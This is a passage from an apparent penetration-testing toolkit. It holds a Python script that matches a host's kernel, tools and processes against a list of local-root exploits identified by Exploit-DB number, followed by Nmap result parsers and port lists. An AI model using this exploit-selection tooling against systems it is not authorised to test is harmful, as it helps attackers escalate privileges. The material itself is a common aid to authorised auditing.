exploit":{"minver":"2.2", "maxver":"2.4.99", "exploitdb":"3", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 245 | "< 2.4.20 Module Loader Local Root Exploit":{"minver":"0", "maxver":"2.4.20", "exploitdb":"12", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 246 | "2.4.22 "'do_brk()'" local Root Exploit (PoC)":{"minver":"2.4.22", "maxver":"2.4.22", "exploitdb":"129", "lang":"asm", "keywords":{"loc":["kernel"], "val":"kernel"}}, 247 | "<= 2.4.22 (do_brk) Local Root Exploit (working)":{"minver":"0", "maxver":"2.4.22", "exploitdb":"131", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 248 | "2.4.x mremap() bound checking Root Exploit":{"minver":"2.4", "maxver":"2.4.99", "exploitdb":"145", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 249 | "<= 2.4.29-rc2 uselib() Privilege Elevation":{"minver":"0", "maxver":"2.4.29", "exploitdb":"744", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 250 | "2.4 uselib() Privilege Elevation Exploit":{"minver":"2.4", "maxver":"2.4", "exploitdb":"778", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 251 | "2.4.x / 2.6.x uselib() Local Privilege Escalation Exploit":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"895", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 252 | "2.4/2.6 bluez Local Root Privilege Escalation Exploit (update)":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"926", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"bluez"}}, 253 | "<= 2.6.11 (CPL 0) Local Root Exploit (k-rad3.c)":{"minver":"0", "maxver":"2.6.11", "exploitdb":"1397", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 254 | "MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit":{"minver":"0", "maxver":"99", "exploitdb":"1518", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"mysql"}}, 255 | "2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2004", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 256 | "2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (2)":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2005", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 257 | "2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (3)":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2006", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 258 | "2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (4)":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2011", "lang":"sh", "keywords":{"loc":["kernel"], "val":"kernel"}}, 259 | "<= 2.6.17.4 (proc) Local Root Exploit":{"minver":"0", "maxver":"2.6.17.4", "exploitdb":"2013", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 260 | "2.6.13 <= 2.6.17.4 prctl() Local Root Exploit (logrotate)":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2031", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 261 | "Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit":{"minver":"4.10", "maxver":"7.04", "exploitdb":"3384", "lang":"c", "keywords":{"loc":["os"], "val":"debian"}}, 262 | "Linux/Kernel 2.4/2.6 x86-64 System Call Emulation Exploit":{"minver":"2.4", "maxver":"2.6", "exploitdb":"4460", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 263 | "< 2.6.11.5 BLUETOOTH Stack Local Root Exploit":{"minver":"0", "maxver":"2.6.11.5", "exploitdb":"4756", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"bluetooth"}}, 264 | "2.6.17 - 2.6.24.1 vmsplice Local Root Exploit":{"minver":"2.6.17", "maxver":"2.6.24.1", "exploitdb":"5092", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 265 | "2.6.23 - 2.6.24 vmsplice Local Root Exploit":{"minver":"2.6.23", "maxver":"2.6.24", "exploitdb":"5093", "lang":"c", "keywords":{"loc":["os"], "val":"debian"}}, 266 | "Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit":{"minver":"0", "maxver":"99", "exploitdb":"5720", "lang":"python", "keywords":{"loc":["os"], "val":"debian"}}, 267 | "Linux Kernel < 2.6.22 ftruncate()/open() Local Exploit":{"minver":"0", "maxver":"2.6.22", "exploitdb":"6851", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 268 | "< 2.6.29 exit_notify() Local Privilege Escalation Exploit":{"minver":"0", "maxver":"2.6.29", "exploitdb":"8369", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 269 | "2.6 UDEV Local Privilege Escalation Exploit":{"minver":"2.6", "maxver":"2.6.99", "exploitdb":"8478", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"udev"}}, 270 | "2.6 UDEV < 141 Local Privilege Escalation Exploit":{"minver":"2.6", "maxver":"2.6.99", "exploitdb":"8572", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"udev"}}, 271 | "2.6.x ptrace_attach Local Privilege Escalation Exploit":{"minver":"2.6", "maxver":"2.6.99", "exploitdb":"8673", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 272 | "2.6.29 ptrace_attach() Local Root Race Condition Exploit":{"minver":"2.6.29", "maxver":"2.6.29", "exploitdb":"8678", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 273 | "Linux Kernel <=2.6.28.3 set_selection() UTF-8 Off By One Local Exploit":{"minver":"0", "maxver":"2.6.28.3", "exploitdb":"9083", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 274 | "Test Kernel Local Root Exploit 0day":{"minver":"2.6.18", "maxver":"2.6.30", "exploitdb":"9191", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 275 | "PulseAudio (setuid) Priv. Escalation Exploit (ubu/9.04)(slack/12.2.0)":{"minver":"2.6.9", "maxver":"2.6.30", "exploitdb":"9208", "lang":"c", "keywords":{"loc":["pkg"], "val":"pulse"}}, 276 | "2.x sock_sendpage() Local Ring0 Root Exploit":{"minver":"2", "maxver":"2.99", "exploitdb":"9435", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 277 | "2.x sock_sendpage() Local Root Exploit 2":{"minver":"2", "maxver":"2.99", "exploitdb":"9436", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 278 | "2.4/2.6 sock_sendpage() ring0 Root Exploit (simple ver)":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"9479", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 279 | "2.6 < 2.6.19 (32bit) ip_append_data() ring0 Root Exploit":{"minver":"2.6", "maxver":"2.6.19", "exploitdb":"9542", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 280 | "2.4/2.6 sock_sendpage() Local Root Exploit (ppc)":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"9545", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 281 | "< 2.6.19 udp_sendmsg Local Root Exploit (x86/x64)":{"minver":"0", "maxver":"2.6.19", "exploitdb":"9574", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 282 | "< 2.6.19 udp_sendmsg Local Root Exploit":{"minver":"0", "maxver":"2.6.19", "exploitdb":"9575", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 283 | "2.4/2.6 sock_sendpage() Local Root Exploit [2]":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"9598", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 284 | "2.4/2.6 sock_sendpage() Local Root Exploit [3]":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"9641", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 285 | "2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 Pipe.c Privelege Escalation":{"minver":"2.4.1", "maxver":"2.6.32", "exploitdb":"9844", "lang":"python", "keywords":{"loc":["kernel"], "val":"kernel"}}, 286 | "'pipe.c' Local Privilege Escalation Vulnerability":{"minver":"2.4.1", "maxver":"2.6.32", "exploitdb":"10018", "lang":"sh", "keywords":{"loc":["kernel"], "val":"kernel"}}, 287 | "2.6.18-20 2009 Local Root Exploit":{"minver":"2.6.18", "maxver":"2.6.20", "exploitdb":"10613", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 288 | "Apache Spamassassin Milter Plugin Remote Root Command Execution":{"minver":"0", "maxver":"99", "exploitdb":"11662", "lang":"sh", "keywords":{"loc":["proc"], "val":"spamass-milter"}}, 289 | "<= 2.6.34-rc3 ReiserFS xattr Privilege Escalation":{"minver":"0", "maxver":"2.6.34", "exploitdb":"12130", "lang":"python", "keywords":{"loc":["mnt"], "val":"reiser"}}, 290 | "Ubuntu PAM MOTD local root":{"minver":"7", "maxver":"10.04", "exploitdb":"14339", "lang":"sh", "keywords":{"loc":["os"], "val":"ubuntu"}}, 291 | "< 2.6.36-rc1 CAN BCM Privilege Escalation Exploit":{"minver":"0", "maxver":"2.6.36", "exploitdb":"14814", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 292 | "Kernel ia32syscall Emulation Privilege Escalation":{"minver":"0", "maxver":"99", "exploitdb":"15023", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 293 | "Linux RDS Protocol Local Privilege Escalation":{"minver":"0", "maxver":"2.6.36", "exploitdb":"15285", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 294 | "<= 2.6.37 Local Privilege Escalation":{"minver":"0", "maxver":"2.6.37", "exploitdb":"15704", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 295 | "< 2.6.37-rc2 ACPI custom_method Privilege Escalation":{"minver":"0", "maxver":"2.6.37", "exploitdb":"15774", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 296 | "CAP_SYS_ADMIN to root Exploit":{"minver":"0", "maxver":"99", "exploitdb":"15916", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 297 | "CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit)":{"minver":"0", "maxver":"99", "exploitdb":"15944", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 298 | "< 2.6.36.2 Econet Privilege Escalation Exploit":{"minver":"0", "maxver":"2.6.36.2", "exploitdb":"17787", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 299 | "Sendpage Local Privilege Escalation":{"minver":"0", "maxver":"99", "exploitdb":"19933", "lang":"ruby", "keywords":{"loc":["kernel"], "val":"kernel"}}, 300 | "2.4.18/19 Privileged File Descriptor Resource Exhaustion Vulnerability":{"minver":"2.4.18", "maxver":"2.4.19", "exploitdb":"21598", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 301 | "2.2.x/2.4.x Privileged Process Hijacking Vulnerability (1)":{"minver":"2.2", "maxver":"2.4.99", "exploitdb":"22362", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 302 | "2.2.x/2.4.x Privileged Process Hijacking Vulnerability (2)":{"minver":"2.2", "maxver":"2.4.99", "exploitdb":"22363", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 303 | "Samba 2.2.8 Share Local Privilege Elevation Vulnerability":{"minver":"2.2.8", "maxver":"2.2.8", "exploitdb":"23674", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"samba"}}, 304 | "open-time Capability file_ns_capable() - Privilege Escalation Vulnerability":{"minver":"0", "maxver":"99", "exploitdb":"25307", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 305 | "open-time Capability file_ns_capable() Privilege Escalation":{"minver":"0", "maxver":"99", "exploitdb":"25450", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 306 | } 307 | 308 | # variable declaration 309 | os = sysInfo["OS"]["results"][0] 310 | version = sysInfo["KERNEL"]["results"][0].split(" ")[2].split("-")[0] 311 | langs = devTools["TOOLS"]["results"] 312 | procs = getAppProc["PROCS"]["results"] 313 | kernel = str(sysInfo["KERNEL"]["results"][0]) 314 | mount = driveInfo["MOUNT"]["results"] 315 | #pkgs = getAppProc["PKGS"]["results"] # currently not using packages for sploit appicability but my in future 316 | 317 | 318 | # lists to hold ranked, applicable sploits 319 | # note: this is a best-effort, basic ranking designed to help in prioritizing priv escalation exploit checks 320 | # all applicable exploits should be checked and this function could probably use some improvement 321 | avgprob = [] 322 | highprob = [] 323 | 324 | for sploit in sploits: 325 | lang = 0 # use to rank applicability of sploits 326 | keyword = sploits[sploit]["keywords"]["val"] 327 | sploitout = sploit + " || " + "http://www.exploit-db.com/exploits/" + sploits[sploit]["exploitdb"] + " || " + "Language=" + sploits[sploit]["lang"] 328 | # first check for kernell applicability 329 | if (version >= sploits[sploit]["minver"]) and (version <= sploits[sploit]["maxver"]): 330 | # next check language applicability 331 | if (sploits[sploit]["lang"] == "c") and (("gcc" in str(langs)) or ("cc" in str(langs))): 332 | lang = 1 # language found, increase applicability score 333 | elif sploits[sploit]["lang"] == "sh": 334 | lang = 1 # language found, increase applicability score 335 | elif (sploits[sploit]["lang"] in str(langs)): 336 | lang = 1 # language found, increase applicability score 337 | if lang == 0: 338 | sploitout = sploitout + "**" # added mark if language not detected on system 339 | # next check keyword matches to determine if some sploits have a higher probability of success 340 | for loc in sploits[sploit]["keywords"]["loc"]: 341 | if loc == "proc": 342 | for proc in procs: 343 | if keyword in proc: 344 | highprob.append(sploitout) # if sploit is associated with a running process consider it a higher probability/applicability 345 | break 346 | break 347 | elif loc == "os": 348 | if (keyword in os) or (keyword in kernel): 349 | highprob.append(sploitout) # if sploit is specifically applicable to this OS consider it a higher probability/applicability 350 | break 351 | elif loc == "mnt": 352 | if keyword in mount: 353 | highprob.append(sploitout) # if sploit is specifically applicable to a mounted file system consider it a higher probability/applicability 354 | break 355 | else: 356 | avgprob.append(sploitout) # otherwise, consider average probability/applicability based only on kernel version 357 | 358 | print " Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!" 359 | print 360 | 361 | print " The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system" 362 | for exploit in highprob: 363 | print " - " + exploit 364 | print 365 | 366 | print " The following exploits are applicable to this kernel version and should be investigated as well" 367 | for exploit in avgprob: 368 | print " - " + exploit 369 | 370 | print 371 | print "Finished" 372 | print bigline 373 | -------------------------------------------------------------------------------- /nmap-files/nmap-ip-port-service-info-ssl-detect.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | #Source: https://github.com/interference-security/scripts-tools-shells/blob/master/nmap-ip-port-service-info.py 4 | #Author: Interference Security 5 | 6 | #Usage: nmap-ip-port-service-info.py [-h] -f INPUTFILE [-o OUTFILE] 7 | #Example: nmap-ip-port-service-info.py -f input_nmap.xml -o output_file.csv 8 | 9 | try: 10 | import sys 11 | import argparse 12 | from datetime import datetime 13 | from libnmap.parser import NmapParser 14 | except: 15 | print "Error: Missing python packages\n" 16 | print "Please ensure you have the following python packages installed:\n argparse, python-libnmap\n" 17 | print "How to install:\npip install \neasy_install \n" 18 | sys.exit(0) 19 | 20 | #Description of script 21 | parser = argparse.ArgumentParser(description="Nmap XML parser and generate CSV ouput") 22 | 23 | #Script command line options 24 | parser.add_argument('-i', '--inputfile', help='Input Nmap XML file', required=True) 25 | parser.add_argument('-o','--outfile', help='Save output in CSV file') 26 | #parser.add_argument('-O','--open', help='Show only open ports') 27 | 28 | args = parser.parse_args() 29 | 30 | targets = [] 31 | 32 | #Disable requests module HTTPS certificate untrusted warning message 33 | try: 34 | requests.packages.urllib3.disable_warnings() 35 | except: 36 | pass 37 | 38 | def parse_nmap_xml(nmap_xml_file, output_file): 39 | oufile = "" 40 | f = None 41 | if len(output_file)>0: 42 | f = open (output_file, "w") 43 | nmap_parse = NmapParser.parse_fromfile(nmap_xml_file) 44 | for host in nmap_parse.hosts: 45 | #print host.address+":" 46 | for service in host.services: 47 | ssl_status = "No" 48 | if len(service.scripts_results) > 0: 49 | for item in service.scripts_results: 50 | if item.has_key("id"): 51 | if item["id"].lower() == "ssl-enum-ciphers": 52 | ssl_status = "Yes" 53 | #import pdb; pdb.set_trace(); 54 | #if "ssl_status" == "Yes": 55 | targets.append(host.address+","+str(service.port)+","+str(service.state)+","+service.service+","+service.banner+","+ssl_status) 56 | #print service.servicefp 57 | #print dir(service) 58 | #print type(service.scripts_results) 59 | #print service.scripts_results 60 | #sys.exit(0) 61 | data = "IP,Port,State,Service Name,Service Info,SSL_TLS" 62 | print data 63 | if f != None: 64 | f.write(data+"\n") 65 | for target in targets: 66 | print target 67 | if f != None: 68 | f.write(target+"\n") 69 | return targets 70 | 71 | #Main function 72 | output_file = "" 73 | input_file = args.inputfile.encode('utf-8') 74 | if args.outfile: 75 | output_file = args.outfile 76 | targets = parse_nmap_xml(input_file, output_file) 77 | -------------------------------------------------------------------------------- /nmap-files/nmap-ip-port-service-info.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | #Source: https://github.com/interference-security/scripts-tools-shells/blob/master/nmap-ip-port-service-info.py 4 | #Author: Interference Security 5 | 6 | #Usage: nmap-ip-port-service-info.py [-h] -f INPUTFILE [-o OUTFILE] 7 | #Example: nmap-ip-port-service-info.py -f input_nmap.xml -o output_file.csv 8 | 9 | try: 10 | import sys 11 | import argparse 12 | from datetime import datetime 13 | from libnmap.parser import NmapParser 14 | except: 15 | print "Error: Missing python packages\n" 16 | print "Please ensure you have the following python packages installed:\n argparse, python-libnmap\n" 17 | print "How to install:\npip install \neasy_install \n" 18 | sys.exit(0) 19 | 20 | #Description of script 21 | parser = argparse.ArgumentParser(description="Nmap XML parser and generate CSV ouput") 22 | 23 | #Script command line options 24 | parser.add_argument('-i', '--inputfile', help='Input Nmap XML file', required=True) 25 | parser.add_argument('-o','--outfile', help='Save output in CSV file') 26 | #parser.add_argument('-O','--open', help='Show only open ports') 27 | 28 | args = parser.parse_args() 29 | 30 | targets = [] 31 | 32 | #Disable requests module HTTPS certificate untrusted warning message 33 | try: 34 | requests.packages.urllib3.disable_warnings() 35 | except: 36 | pass 37 | 38 | def parse_nmap_xml(nmap_xml_file, output_file): 39 | oufile = "" 40 | f = None 41 | if len(output_file)>0: 42 | f = open (output_file, "w") 43 | nmap_parse = NmapParser.parse_fromfile(nmap_xml_file) 44 | for host in nmap_parse.hosts: 45 | #print host.address+":" 46 | for service in host.services: 47 | targets.append(host.address+","+str(service.port)+","+str(service.state)+","+service.service+","+service.banner) 48 | #print service.servicefp 49 | #print dir(service) 50 | #print type(service.scripts_results) 51 | #print service.scripts_results 52 | #sys.exit(0) 53 | data = "IP,Port,State,Service Name,Service Info" 54 | print data 55 | if f != None: 56 | f.write(data+"\n") 57 | for target in targets: 58 | print target 59 | if f != None: 60 | f.write(target+"\n") 61 | return targets 62 | 63 | #Main function 64 | output_file = "" 65 | input_file = args.inputfile.encode('utf-8') 66 | if args.outfile: 67 | output_file = args.outfile 68 | targets = parse_nmap_xml(input_file, output_file) 69 | -------------------------------------------------------------------------------- /nmap-files/nmap-port-gen.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | ports = ["3-4","6-7","19-26","32-33","42-43","79-85","88-90","99-100","109-111","143-144","211-212","254-256","406-407","416-417","443-445","464-465","512-515","543-545","554-555","616-617","666-668","800-801","900-903","911-912","992-993","999-1002","1009-1011","1021-1100","1104-1108","1110-1114","1121-1124","1130-1132","1137-1138","1147-1149","1151-1152","1163-1166","1174-1175","1185-1187","1198-1199","1216-1218","1233-1234","1247-1248","1271-1272","1300-1301","1309-1311","1433-1434","1500-1501","1687-1688","1717-1721","1782-1783","1839-1840","1862-1864","1971-1972","1998-2010","2020-2022","2033-2035","2040-2043","2045-2049","2099-2100","2105-2107","2160-2161","2190-2191","2381-2383","2393-2394","2601-2602","2604-2605","2607-2608","2701-2702","2717-2718","2909-2910","2967-2968","3000-3001","3005-3007","3030-3031","3260-3261","3268-3269","3300-3301","3322-3325","3369-3372","3389-3390","3689-3690","3800-3801","3826-3828","4000-4006","4125-4126","4443-4446","4899-4900","5000-5004","5050-5051","5060-5061","5100-5102","5221-5222","5225-5226","5431-5432","5678-5679","5800-5802","5810-5811","5900-5904","5906-5907","5910-5911","5959-5963","5987-5989","5998-6007","6100-6101","6565-6567","6666-6669","6788-6789","7000-7002","7200-7201","7777-7778","7920-7921","7937-7938","7999-8002","8007-8011","8021-8022","8080-8090","8099-8100","8180-8181","8192-8194","8290-8292","8651-8652","9000-9003","9009-9011","9080-9081","9090-9091","9099-9103","9110-9111","9502-9503","9593-9595","9876-9878","9943-9944","9998-10004","10009-10010","10024-10025","10616-10617","10628-10629","11110-11111","13782-13783","14441-14442","15002-15004","16000-16001","16992-16993","20221-20222","25734-25735","27352-27353","27355-27356","32768-32785","34571-34573","44442-44443","49152-49161","49175-49176","49999-50003","55055-55056","56737-56738"] 3 | f = open("out.txt","a") 4 | for rport in ports: 5 | ssp = rport.split("-") 6 | for i in range(int(ssp[0]),int(ssp[1])+1): 7 | print i 8 | f.write(str(i)+"\n") 9 | f.close() 10 | -------------------------------------------------------------------------------- /nmap-files/nmap-top-ports.txt: -------------------------------------------------------------------------------- 1 | 1 2 | 3 3 | 4 4 | 6 5 | 7 6 | 9 7 | 13 8 | 17 9 | 19 10 | 20 11 | 21 12 | 22 13 | 23 14 | 24 15 | 25 16 | 26 17 | 30 18 | 32 19 | 33 20 | 37 21 | 42 22 | 43 23 | 49 24 | 53 25 | 70 26 | 79 27 | 80 28 | 81 29 | 82 30 | 83 31 | 84 32 | 85 33 | 88 34 | 89 35 | 90 36 | 99 37 | 100 38 | 106 39 | 109 40 | 110 41 | 111 42 | 113 43 | 119 44 | 125 45 | 135 46 | 139 47 | 143 48 | 144 49 | 146 50 | 161 51 | 163 52 | 179 53 | 199 54 | 211 55 | 212 56 | 222 57 | 254 58 | 255 59 | 256 60 | 259 61 | 264 62 | 280 63 | 301 64 | 306 65 | 311 66 | 340 67 | 366 68 | 389 69 | 406 70 | 407 71 | 416 72 | 417 73 | 425 74 | 427 75 | 443 76 | 444 77 | 445 78 | 458 79 | 464 80 | 465 81 | 481 82 | 497 83 | 500 84 | 512 85 | 513 86 | 514 87 | 515 88 | 524 89 | 541 90 | 543 91 | 544 92 | 545 93 | 548 94 | 554 95 | 555 96 | 563 97 | 587 98 | 593 99 | 616 100 | 617 101 | 625 102 | 631 103 | 636 104 | 646 105 | 648 106 | 666 107 | 667 108 | 668 109 | 683 110 | 687 111 | 691 112 | 700 113 | 705 114 | 711 115 | 714 116 | 720 117 | 722 118 | 726 119 | 749 120 | 765 121 | 777 122 | 783 123 | 787 124 | 800 125 | 801 126 | 808 127 | 843 128 | 873 129 | 880 130 | 888 131 | 898 132 | 900 133 | 901 134 | 902 135 | 903 136 | 911 137 | 912 138 | 981 139 | 987 140 | 990 141 | 992 142 | 993 143 | 995 144 | 999 145 | 1000 146 | 1001 147 | 1002 148 | 1007 149 | 1009 150 | 1010 151 | 1011 152 | 1021 153 | 1022 154 | 1023 155 | 1024 156 | 1025 157 | 1026 158 | 1027 159 | 1028 160 | 1029 161 | 1030 162 | 1031 163 | 1032 164 | 1033 165 | 1034 166 | 1035 167 | 1036 168 | 1037 169 | 1038 170 | 1039 171 | 1040 172 | 1041 173 | 1042 174 | 1043 175 | 1044 176 | 1045 177 | 1046 178 | 1047 179 | 1048 180 | 1049 181 | 1050 182 | 1051 183 | 1052 184 | 1053 185 | 1054 186 | 1055 187 | 1056 188 | 1057 189 | 1058 190 | 1059 191 | 1060 192 | 1061 193 | 1062 194 | 1063 195 | 1064 196 | 1065 197 | 1066 198 | 1067 199 | 1068 200 | 1069 201 | 1070 202 | 1071 203 | 1072 204 | 1073 205 | 1074 206 | 1075 207 | 1076 208 | 1077 209 | 1078 210 | 1079 211 | 1080 212 | 1081 213 | 1082 214 | 1083 215 | 1084 216 | 1085 217 | 1086 218 | 1087 219 | 1088 220 | 1089 221 | 1090 222 | 1091 223 | 1092 224 | 1093 225 | 1094 226 | 1095 227 | 1096 228 | 1097 229 | 1098 230 | 1099 231 | 1100 232 | 1102 233 | 1104 234 | 1105 235 | 1106 236 | 1107 237 | 1108 238 | 1110 239 | 1111 240 | 1112 241 | 1113 242 | 1114 243 | 1117 244 | 1119 245 | 1121 246 | 1122 247 | 1123 248 | 1124 249 | 1126 250 | 1130 251 | 1131 252 | 1132 253 | 1137 254 | 1138 255 | 1141 256 | 1145 257 | 1147 258 | 1148 259 | 1149 260 | 1151 261 | 1152 262 | 1154 263 | 1163 264 | 1164 265 | 1165 266 | 1166 267 | 1169 268 | 1174 269 | 1175 270 | 1183 271 | 1185 272 | 1186 273 | 1187 274 | 1192 275 | 1198 276 | 1199 277 | 1201 278 | 1213 279 | 1216 280 | 1217 281 | 1218 282 | 1233 283 | 1234 284 | 1236 285 | 1244 286 | 1247 287 | 1248 288 | 1259 289 | 1271 290 | 1272 291 | 1277 292 | 1287 293 | 1296 294 | 1300 295 | 1301 296 | 1309 297 | 1310 298 | 1311 299 | 1322 300 | 1328 301 | 1334 302 | 1352 303 | 1417 304 | 1433 305 | 1434 306 | 1443 307 | 1455 308 | 1461 309 | 1494 310 | 1500 311 | 1501 312 | 1503 313 | 1521 314 | 1524 315 | 1533 316 | 1556 317 | 1580 318 | 1583 319 | 1594 320 | 1600 321 | 1641 322 | 1658 323 | 1666 324 | 1687 325 | 1688 326 | 1700 327 | 1717 328 | 1718 329 | 1719 330 | 1720 331 | 1721 332 | 1723 333 | 1755 334 | 1761 335 | 1782 336 | 1783 337 | 1801 338 | 1805 339 | 1812 340 | 1839 341 | 1840 342 | 1862 343 | 1863 344 | 1864 345 | 1875 346 | 1900 347 | 1914 348 | 1935 349 | 1947 350 | 1971 351 | 1972 352 | 1974 353 | 1984 354 | 1998 355 | 1999 356 | 2000 357 | 2001 358 | 2002 359 | 2003 360 | 2004 361 | 2005 362 | 2006 363 | 2007 364 | 2008 365 | 2009 366 | 2010 367 | 2013 368 | 2020 369 | 2021 370 | 2022 371 | 2030 372 | 2033 373 | 2034 374 | 2035 375 | 2038 376 | 2040 377 | 2041 378 | 2042 379 | 2043 380 | 2045 381 | 2046 382 | 2047 383 | 2048 384 | 2049 385 | 2065 386 | 2068 387 | 2099 388 | 2100 389 | 2103 390 | 2105 391 | 2106 392 | 2107 393 | 2111 394 | 2119 395 | 2121 396 | 2126 397 | 2135 398 | 2144 399 | 2160 400 | 2161 401 | 2170 402 | 2179 403 | 2190 404 | 2191 405 | 2196 406 | 2200 407 | 2222 408 | 2251 409 | 2260 410 | 2288 411 | 2301 412 | 2323 413 | 2366 414 | 2381 415 | 2382 416 | 2383 417 | 2393 418 | 2394 419 | 2399 420 | 2401 421 | 2492 422 | 2500 423 | 2522 424 | 2525 425 | 2557 426 | 2601 427 | 2602 428 | 2604 429 | 2605 430 | 2607 431 | 2608 432 | 2638 433 | 2701 434 | 2702 435 | 2710 436 | 2717 437 | 2718 438 | 2725 439 | 2800 440 | 2809 441 | 2811 442 | 2869 443 | 2875 444 | 2909 445 | 2910 446 | 2920 447 | 2967 448 | 2968 449 | 2998 450 | 3000 451 | 3001 452 | 3003 453 | 3005 454 | 3006 455 | 3007 456 | 3011 457 | 3013 458 | 3017 459 | 3030 460 | 3031 461 | 3052 462 | 3071 463 | 3077 464 | 3128 465 | 3168 466 | 3211 467 | 3221 468 | 3260 469 | 3261 470 | 3268 471 | 3269 472 | 3283 473 | 3300 474 | 3301 475 | 3306 476 | 3322 477 | 3323 478 | 3324 479 | 3325 480 | 3333 481 | 3351 482 | 3367 483 | 3369 484 | 3370 485 | 3371 486 | 3372 487 | 3389 488 | 3390 489 | 3404 490 | 3476 491 | 3493 492 | 3517 493 | 3527 494 | 3546 495 | 3551 496 | 3580 497 | 3659 498 | 3689 499 | 3690 500 | 3703 501 | 3737 502 | 3766 503 | 3784 504 | 3800 505 | 3801 506 | 3809 507 | 3814 508 | 3826 509 | 3827 510 | 3828 511 | 3851 512 | 3869 513 | 3871 514 | 3878 515 | 3880 516 | 3889 517 | 3905 518 | 3914 519 | 3918 520 | 3920 521 | 3945 522 | 3971 523 | 3986 524 | 3995 525 | 3998 526 | 4000 527 | 4001 528 | 4002 529 | 4003 530 | 4004 531 | 4005 532 | 4006 533 | 4045 534 | 4111 535 | 4125 536 | 4126 537 | 4129 538 | 4224 539 | 4242 540 | 4279 541 | 4321 542 | 4343 543 | 4443 544 | 4444 545 | 4445 546 | 4446 547 | 4449 548 | 4550 549 | 4567 550 | 4662 551 | 4848 552 | 4899 553 | 4900 554 | 4998 555 | 5000 556 | 5001 557 | 5002 558 | 5003 559 | 5004 560 | 5009 561 | 5030 562 | 5033 563 | 5050 564 | 5051 565 | 5054 566 | 5060 567 | 5061 568 | 5080 569 | 5087 570 | 5100 571 | 5101 572 | 5102 573 | 5120 574 | 5190 575 | 5200 576 | 5214 577 | 5221 578 | 5222 579 | 5225 580 | 5226 581 | 5269 582 | 5280 583 | 5298 584 | 5357 585 | 5405 586 | 5414 587 | 5431 588 | 5432 589 | 5440 590 | 5500 591 | 5510 592 | 5544 593 | 5550 594 | 5555 595 | 5560 596 | 5566 597 | 5631 598 | 5633 599 | 5666 600 | 5678 